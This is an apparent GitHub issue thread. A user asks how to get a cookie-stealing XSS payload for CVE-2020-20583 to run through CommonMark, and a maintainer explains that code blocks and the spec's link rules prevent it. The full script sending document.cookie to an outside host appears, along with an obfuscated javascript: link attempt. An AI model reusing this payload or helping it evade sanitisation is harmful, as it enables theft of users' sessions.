Question: script markdown transformation

[lqgithu]

I have below script used in CVE-2020-20583 and to be transformed into common mark format:

<script>new Image ().src="http://test.com:2222/"+document.cookie; </script>

I tried below two methods:

1. " three backtick+ javascript
   new Image ().src="http://test.com:2222/"+document.cookie;
   "three backtick
   but it only display command, it didn't execute the command.

2. "[Click me]""(javascri%0Apt":new\Image().src="http://test.com:2222/"+document.cookie)"
   the command not able to include .src=****** into the hyperlink
   so is there any limitation for markdown to handle scripts with spaces? thanks

[colinodell]

three backtick [...] only display command, it didn't execute the command.

Using three backticks creates a fenced code block which will render the code as-is - good for sharing code examples

so is there any limitation for markdown to handle scripts with spaces?

Yes, as I mentioned yesterday, the CommonMark spec does not allow for ASCII spaces within link destinations, including ones that are actually malicious XSS links like your example.